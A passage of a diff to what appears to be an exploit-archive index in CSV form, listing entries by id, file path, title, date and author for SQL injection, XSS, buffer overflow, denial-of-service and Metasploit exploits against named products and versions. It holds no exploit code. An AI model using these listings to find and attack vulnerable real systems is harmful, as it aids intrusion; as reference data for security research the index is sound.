4.1.11.100 - (.ac3) Denial of Service",2013-07-01,metacom,windows,dos,0 26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - SEH Overflow",2013-07-01,"Jacob Holcomb",windows,local,0 26521,platforms/php/webapps/26521.txt,"C.P.Sub 4.5 - Authentication Bypass",2013-07-01,Chako,php,webapps,0 26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (msf)",2013-07-01,Asesino04,windows,local,0 +27437,platforms/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 index.php st Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - (.wvx) SEH Buffer Overflow",2013-07-01,MrXors,windows,local,0 26526,platforms/windows/dos/26526.py,"VLC Media Player 2.0.7 - (.png) Crash PoC",2013-07-01,"Kevin Fujimoto",windows,dos,0 26527,platforms/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps,0 @@ -23623,6 +23685,7 @@ id,file,description,date,author,platform,type,port 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0 26554,platforms/windows/local/26554.rb,"Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,metasploit,windows,local,0 26555,platforms/windows/dos/26555.txt,"Opera 12.15 vtable Corruption",2013-07-02,echo,windows,dos,0 +26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 customer.tickets.view.php Multiple Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0 26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack-based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0 26559,platforms/php/webapps/26559.txt,"Virtual Hosting Control System 2.2/2.4 Error Message Cross-Site Scripting Vulnerability",2005-11-22,"Moritz Naumann",php,webapps,0 @@ -23643,6 +23706,7 @@ id,file,description,date,author,platform,type,port 26574,platforms/php/webapps/26574.txt,"blogBuddies 0.3 magpie_slashbox.php rss_url Parameter XSS",2005-11-23,gb.network,php,webapps,0 26575,platforms/windows/dos/26575.txt,"MailEnable 1.1/1.7 IMAP Rename Request Remote Denial of Service Vulnerability",2005-11-23,"Josh Zlatin-Amishav",windows,dos,0 26576,platforms/php/webapps/26576.txt,"FreeForum 1.0/1.1 - Multiple SQL Injection Vulnerabilities",2005-11-23,r0t3d3Vil,php,webapps,0 +28085,platforms/windows/local/28085.html,"KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)",2013-09-04,blake,windows,local,0 26578,platforms/windows/dos/26578.py,"Realtek Sound Manager AvRack (.wav) - Crash PoC",2013-07-03,Asesino04,windows,dos,0 26579,platforms/windows/local/26579.rb,"ABBS Audio Media Player .LST Buffer Overflow",2013-07-03,metasploit,windows,local,0 26580,platforms/php/webapps/26580.txt,"SoftBiz Web Hosting Directory Script 1.1 - search_result.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 @@ -23801,6 +23865,7 @@ id,file,description,date,author,platform,type,port 26736,platforms/hardware/webapps/26736.txt,"Zoom X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",hardware,webapps,0 26737,platforms/linux/remote/26737.pl,"nginx 1.3.9/1.4.0 x86 - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0 26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80 +27634,platforms/php/webapps/27634.txt,"PatroNet CMS Index.PHP Cross-Site Scripting Vulnerability",2006-04-12,Soothackers,php,webapps,0 26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x Email Attachments HTML Injection Vulnerability",2005-12-06,"SEC Consult",linux,remote,0 26742,platforms/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 Password.ASP Cross-Site Scripting Vulnerability",2005-12-06,Dj_Eyes,asp,webapps,0 26743,platforms/asp/webapps/26743.txt,"IISWorks ASPKnowledgeBase 2.0 KB.ASP Cross-Site Scripting Vulnerability",2005-12-06,r0t,asp,webapps,0 @@ -23863,6 +23928,7 @@ id,file,description,date,author,platform,type,port 26800,platforms/php/webapps/26800.txt,"Snipe Gallery 3.1.4 image.php image_id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 26801,platforms/php/webapps/26801.txt,"Snipe Gallery 3.1.4 - search.php keyword Parameter XSS",2005-12-13,r0t,php,webapps,0 26802,platforms/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,hardware,dos,0 +27438,platforms/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 Calendar Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 26804,platforms/php/webapps/26804.txt,"Wordpress Spicy Blogroll Plugin - File Inclusion Vulnerability",2013-07-13,Ahlspiess,php,webapps,0 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion Stack Buffer Overflow",2013-07-13,metasploit,windows,local,0 26806,platforms/asp/webapps/26806.txt,"BMC Service Desk Express 10.2.1.95 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",asp,webapps,0 @@ -23886,10 +23952,6 @@ id,file,description,date,author,platform,type,port 26824,platforms/php/webapps/26824.txt,"WikkaWiki 1.1.6 TextSearch.PHP Cross-Site Scripting Vulnerability",2005-12-14,r0t,php,webapps,0 26825,platforms/hardware/dos/26825.txt,"Multiple Linksys Routers LanD Packet Denial of Service Vulnerability",2005-12-14,"Justin M. Wray",hardware,dos,0 26826,platforms/php/webapps/26826.txt,"Netref 3.0 Index.PHP SQL Injection Vulnerability",2005-12-14,syst3m_f4ult,php,webapps,0 -26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 -26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 customer.tickets.view.php Multiple Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 -26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 subscribers.tracking.edit.php subtrackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 -26830,platforms/php/webapps/26830.txt,"QuickPayPro 3.1 design.php delete Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26831,platforms/php/webapps/26831.txt,"QuickPayPro 3.1 tracking.details.php trackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26832,platforms/php/webapps/26832.txt,"QuickPayPro 3.1 sales.view.php customerid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26833,platforms/hardware/dos/26833.txt,"Multiple Unspecified Cisco Catalyst Switches LanD Packet Denial of Service Vulnerability",2005-12-14,"Justin M. Wray",hardware,dos,0 @@ -24014,7 +24076,7 @@ id,file,description,date,author,platform,type,port 26952,platforms/ios/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 26953,platforms/ios/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 26954,platforms/ios/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 -26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2 and 1.4.1 (index.php, p param) - Directory Traversal Vulnerability",2013-07-18,Mahendra,php,webapps,0 +26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2 and 1.4.1 (index.php p param) - Directory Traversal Vulnerability",2013-07-18,Mahendra,php,webapps,0 26956,platforms/windows/webapps/26956.txt,"Dell PacketTrap MSP RMM 6.6.x - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26957,platforms/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26958,platforms/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Stored XSS Vulnerability",2013-07-18,DURAKIBOX,php,webapps,0 @@ -24064,9 +24126,14 @@ id,file,description,date,author,platform,type,port 27002,platforms/php/webapps/27002.txt,"Jevontech PHPenpals PersonalID SQL Injection Vulnerability",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27003,platforms/php/webapps/27003.txt,"InTouch 0.5.1 Alpha User Variable SQL Injection Vulnerability",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 Readold Variable SQL Injection Vulnerability",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27005,platforms/hardware/webapps/27005.txt,"Barracuda LB, SVF, WAF & WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,hardware,webapps,0 +27633,platforms/php/webapps/27633.txt,"MyBB 1.10 Member.PHP Cross-Site Scripting Vulnerability",2006-04-12,o.y.6,php,webapps,0 +27005,platforms/hardware/webapps/27005.txt,"Barracuda LB_ SVF_ WAF & WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27006,platforms/hardware/webapps/27006.txt,"Barracuda CudaTel 2.6.02.040 - SQL Injection Vulnerability",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27007,platforms/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote Exploit (msf)",2013-07-22,MSJ,windows,remote,21 +27439,platforms/php/webapps/27439.txt,"Invision Power Services Invision Board 2.0.4 Print Action t Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 +27440,platforms/php/webapps/27440.txt,"Invision Power Services Invision Board 2.0.4 Mail Action MID Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 +27441,platforms/php/webapps/27441.txt,"Invision Power Services Invision Board 2.0.4 Help Action HID Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 +27442,platforms/php/webapps/27442.txt,"Invision Power Services Invision Board 2.0.4 Members Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 27009,platforms/php/webapps/27009.txt,"MLM (Multi Level Marketing) Script - Multiple Vulnerabilities",2013-07-22,3spi0n,php,webapps,0 27010,platforms/windows/dos/27010.txt,"VbsEdit 5.9.3 - (.smi) Buffer Overflow Vulnerability",2013-07-22,d3b4g,windows,dos,0 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 @@ -24097,6 +24164,11 @@ id,file,description,date,author,platform,type,port 27037,platforms/php/webapps/27037.txt,"TheWebForum 1.2.1 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27038,platforms/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27039,platforms/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities",2013-07-23,Vulnerability-Lab,php,webapps,0 +27356,platforms/php/webapps/27356.txt,"CutePHP CuteNews 1.4.1 Index.PHP Cross-Site Scripting Vulnerability",2006-03-04,"Roozbeh Afrasiabi",php,webapps,0 +27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 Information Disclosure Vulnerability",2006-03-04,Retard,php,webapps,0 +27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 index.php page Parameter XSS",2006-03-06,Liz0ziM,php,webapps,0 +27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 dv_gbook.php f Parameter XSS",2006-03-06,Liz0ziM,php,webapps,0 +27360,platforms/php/webapps/27360.txt,"RunCMS 1.x Bigshow.PHP Cross-Site Scripting Vulnerability",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 27041,platforms/windows/local/27041.pl,"Super Player 3500 - (.m3u) Local Stack Based Buffer Overflow",2013-07-23,jun,windows,local,0 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600 @@ -24106,7 +24178,7 @@ id,file,description,date,author,platform,type,port 27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - (.awd) Buffer Overflow Vulnerability",2013-07-23,"Core Security",windows,dos,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Include Vulnerability",2006-01-09,Xez,php,webapps,0 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - (.pct) Buffer Overflow Vulnerability",2013-07-23,"Core Security",windows,dos,0 -27050,platforms/windows/dos/27050.txt,"DirectShow Arbitrary Memory Overwrite Vulnerability (MS13-056)",2013-07-23,"Andrs Gmez Ramrez",windows,dos,0 +27050,platforms/windows/dos/27050.txt,"DirectShow Arbitrary Memory Overwrite Vulnerability (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 27051,platforms/windows/dos/27051.txt,"Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 27052,platforms/php/webapps/27052.txt,"427BB 2.2 Showthread.PHP SQL Injection Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27053,platforms/php/webapps/27053.txt,"Venom Board Post.PHP3 - Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24233,6 +24305,7 @@ id,file,description,date,author,platform,type,port 27175,platforms/php/webapps/27175.php,"PwsPHP 1.2.3 Index.PHP SQL Injection Vulnerability",2006-02-09,papipsycho,php,webapps,0 27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU CSRF/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 +27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 Showtopic SQL Injection Vulnerability",2006-03-06,Mr.SNAKE,php,webapps,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM Bind Shell (Port 4444)",2013-07-28,"Matthew Graeber",arm,shellcode,0 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 iNotes javascript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes Email Subject XSS",2006-02-10,"Jakob Balle",multiple,remote,0 @@ -24289,7 +24362,7 @@ id,file,description,date,author,platform,type,port 27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 chopSAPLog.dsp fullName Variable Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 deleteSingle fullName Variable Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 adapter-index.dsp url Variable Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 -27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 Private.PHP Multiple SQL Injection Vulnerabilities",2006-02-15,imei,php,webapps,0 +27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - Private.PHP Multiple SQL Injection Vulnerabilities",2006-02-15,imei,php,webapps,0 27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 HTML Injection Vulnerability",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27238,platforms/php/webapps/27238.php,"DreamCost HostAdmin 3.0 Index.PHP Remote File Include Vulnerability",2006-02-16,ReZEN,php,webapps,0 27239,platforms/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injection Vulnerabilities",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24323,15 +24396,19 @@ id,file,description,date,author,platform,type,port 27267,platforms/php/webapps/27267.txt,"Dragonfly CMS 9.0.6.1 - Surveys Module Multiple Parameter XSS",2006-02-22,Lostmon,php,webapps,0 27268,platforms/php/webapps/27268.txt,"Dragonfly CMS 9.0.6.1 - Downloads Module c Parameter XSS",2006-02-22,Lostmon,php,webapps,0 27269,platforms/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 - Coppermine Module album Parameter XSS",2006-02-22,Lostmon,php,webapps,0 +27494,platforms/php/webapps/27494.txt,"PHPmyfamily 1.4.1 Track.PHP Cross-Site Scripting Vulnerability",2006-03-28,matrix_killer,php,webapps,0 +27495,platforms/php/webapps/27495.txt,"phpCOIN 1.2 mod_print.php fs Parameter XSS",2006-03-28,r0t,php,webapps,0 +27496,platforms/php/webapps/27496.txt,"phpCOIN 1.2 mod.php fs Parameter XSS",2006-03-28,r0t,php,webapps,0 27271,platforms/windows/remote/27271.rb,"HP Data Protector CMD Install Service Vulnerability (msf)",2013-08-02,"Ben Turner",windows,remote,0 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) - Crash PoC",2013-08-02,d3b4g,windows,dos,0 -27274,platforms/php/webapps/27274.txt,"Ginkgo CMS (index.php, rang param) - SQL Injection",2013-08-02,Raw-x,php,webapps,0 +27274,platforms/php/webapps/27274.txt,"Ginkgo CMS (index.php rang param) - SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez Remote File Upload Vulnerability",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account CSRF",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 PASS Command - Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 +27528,platforms/hardware/remote/27528.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-12,metasploit,hardware,remote,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM <= 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 -27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b (pages.php, page_name param) - SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 +27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b (pages.php page_name param) - SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 27284,platforms/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -24406,16 +24483,11 @@ id,file,description,date,author,platform,type,port 27353,platforms/php/webapps/27353.txt,"phpArcadeScript 2.0 displaygame.php gamefile Parameter XSS",2006-03-04,Retard,php,webapps,0 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 New User Image File HTML Injection Vulnerability",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 Misc.PHP Cross-Site Scripting Vulnerability",2006-03-04,r57shell,php,webapps,0 -27356,platforms/php/webapps/27356.txt,"CutePHP CuteNews 1.4.1 Index.PHP Cross-Site Scripting Vulnerability",2006-03-04,"Roozbeh Afrasiabi",php,webapps,0 -27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 Information Disclosure Vulnerability",2006-03-04,Retard,php,webapps,0 -27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 index.php page Parameter XSS",2006-03-06,Liz0ziM,php,webapps,0 -27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 dv_gbook.php f Parameter XSS",2006-03-06,Liz0ziM,php,webapps,0 -27360,platforms/php/webapps/27360.txt,"RunCMS 1.x Bigshow.PHP Cross-Site Scripting Vulnerability",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 -27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 Showtopic SQL Injection Vulnerability",2006-03-06,Mr.SNAKE,php,webapps,0 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 Title Field HTML Injection Vulnerability",2006-03-06,Kiki,php,webapps,0 27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x Common.PHP Remote File Include Vulnerability",2006-03-06,ERNE,php,webapps,0 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 Login.PHP Cross-Site Scripting Vulnerability",2006-03-06,Retard,php,webapps,0 27365,platforms/multiple/dos/27365.txt,"Monopd 0.9.3 - Remote Denial of Service Vulnerability",2006-03-06,"Luigi Auriemma",multiple,dos,0 +27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link HTML Injection Vulnerability",2006-04-01,s3rv3r_hack3r,php,webapps,0 27367,platforms/php/webapps/27367.txt,"Link Bank Iframe.PHP Cross-Site Scripting Vulnerability",2006-03-07,Retard,php,webapps,0 27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 podcast.php id Parameter SQL Injection",2006-03-07,tzitaroth,php,webapps,0 27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 index.php template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 @@ -24479,16 +24551,8 @@ id,file,description,date,author,platform,type,port 27429,platforms/windows/remote/27429.rb,"Firefox onreadystatechange Event DocumentViewerImpl Use After Free",2013-08-08,metasploit,windows,remote,0 27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) Multiple SQL Injection Vulnerabilities",2013-08-08,"Matias Fontanini",php,webapps,0 27431,platforms/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",php,webapps,0 -27433,platforms/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow Vulnerability",2006-03-16,"Michal Zalewski",windows,dos,0 -27434,platforms/php/webapps/27434.txt,"Oxynews Index.PHP SQL Injection Vulnerability",2006-03-16,R00T3RR0R,php,webapps,0 -27435,platforms/php/webapps/27435.txt,"PHPMyAdmin 2.8.1 Set_Theme Cross-Site Scripting Vulnerability",2006-03-16,"Ali Asad",php,webapps,0 -27436,platforms/php/webapps/27436.txt,"Invision Power Services Invision Board 2.0.4 - Search Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 -27437,platforms/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 index.php st Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 -27438,platforms/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 Calendar Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 -27439,platforms/php/webapps/27439.txt,"Invision Power Services Invision Board 2.0.4 Print Action t Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 -27440,platforms/php/webapps/27440.txt,"Invision Power Services Invision Board 2.0.4 Mail Action MID Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 -27441,platforms/php/webapps/27441.txt,"Invision Power Services Invision Board 2.0.4 Help Action HID Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 -27442,platforms/php/webapps/27442.txt,"Invision Power Services Invision Board 2.0.4 Members Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 +27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 +27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 Month.PHP SQL Injection Vulnerability",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 27443,platforms/php/webapps/27443.txt,"ExtCalendar 1.0 - Cross-Site Scripting Vulnerabilities",2006-03-18,Soothackers,php,webapps,0 27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability",2006-03-18,r57shell,php,webapps,0 27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 index.php Multiple Parameter SQL Injection",2006-03-18,Linux_Drox,php,webapps,0 @@ -24540,9 +24604,6 @@ id,file,description,date,author,platform,type,port 27491,platforms/cfm/webapps/27491.txt,"FusionZONE CouponZONE 4.2 - Multiple SQL Injection Vulnerabilities",2006-03-27,r0t,cfm,webapps,0 27492,platforms/php/webapps/27492.txt,"ActiveCampaign SupportTrio 2.50.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,php,webapps,0 27493,platforms/cfm/webapps/27493.txt,"RealestateZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps,0 -27494,platforms/php/webapps/27494.txt,"PHPmyfamily 1.4.1 Track.PHP Cross-Site Scripting Vulnerability",2006-03-28,matrix_killer,php,webapps,0 -27495,platforms/php/webapps/27495.txt,"phpCOIN 1.2 mod_print.php fs Parameter XSS",2006-03-28,r0t,php,webapps,0 -27496,platforms/php/webapps/27496.txt,"phpCOIN 1.2 mod.php fs Parameter XSS",2006-03-28,r0t,php,webapps,0 27497,platforms/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 shared_order.php sharedPlanID Parameter XSS",2006-03-28,r0t,php,webapps,0 27498,platforms/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 dedicated_order.php dedicatedPlanID Parameter XSS",2006-03-28,r0t,php,webapps,0 27499,platforms/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 server_management.php plan_id Parameter XSS",2006-03-28,r0t,php,webapps,0 @@ -24562,20 +24623,21 @@ id,file,description,date,author,platform,type,port 27513,platforms/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injection Vulnerabilities",2006-03-30,"Aliaksandr Hartsuyeu",php,webapps,0 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Adding/Editing New Administrator Account CSRF",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0 -27518,platforms/php/webapps/27518.txt,"MLMAuction Script (gallery.php, id param) - SQL Injection",2013-08-12,3spi0n,php,webapps,0 +27518,platforms/php/webapps/27518.txt,"MLMAuction Script (gallery.php id param) - SQL Injection",2013-08-12,3spi0n,php,webapps,0 27519,platforms/php/webapps/27519.txt,"phpVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 +27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 Index.PHP Cross-Site Scripting Vulnerability",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 27522,platforms/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities",2013-08-12,LiquidWorm,php,webapps,80 +27533,platforms/php/webapps/27533.txt,"X-Changer 0.20 - Multiple SQL Injection Vulnerabilities",2006-03-30,"Morocco Security Team",php,webapps,0 27523,platforms/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,windows,remote,21 +27728,platforms/cgi/webapps/27728.txt,"Blender 2.36 BVF File Import Python Code Execution Vulnerability",2006-04-24,"Joxean Koret",cgi,webapps,0 27525,platforms/php/webapps/27525.txt,"Integrated CMS 1.0 - SQL Injection",2013-08-12,DSST,php,webapps,80 27526,platforms/windows/remote/27526.txt,"Oracle Java storeImageArray() Invalid Array Indexing",2013-08-12,"Packet Storm",windows,remote,0 27527,platforms/multiple/remote/27527.rb,"Ruby on Rails Known Secret Session Cookie Remote Code Execution",2013-08-12,metasploit,multiple,remote,0 -27528,platforms/hardware/remote/27528.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-12,metasploit,hardware,remote,0 27529,platforms/php/remote/27529.rb,"OpenX Backdoor PHP Code Execution",2013-08-12,metasploit,php,remote,0 27530,platforms/multiple/remote/27530.rb,"Squash YAML Code Execution",2013-08-12,metasploit,multiple,remote,0 27531,platforms/php/webapps/27531.txt,"Wordpress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 27532,platforms/php/webapps/27532.txt,"Joomla redSHOP Component 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 -27533,platforms/php/webapps/27533.txt,"X-Changer 0.20 - Multiple SQL Injection Vulnerabilities",2006-03-30,"Morocco Security Team",php,webapps,0 27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery Index.PHP Remote File Include Vulnerability",2006-03-30,"Morocco Security Team",php,webapps,0 27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 Post.PHP SQL 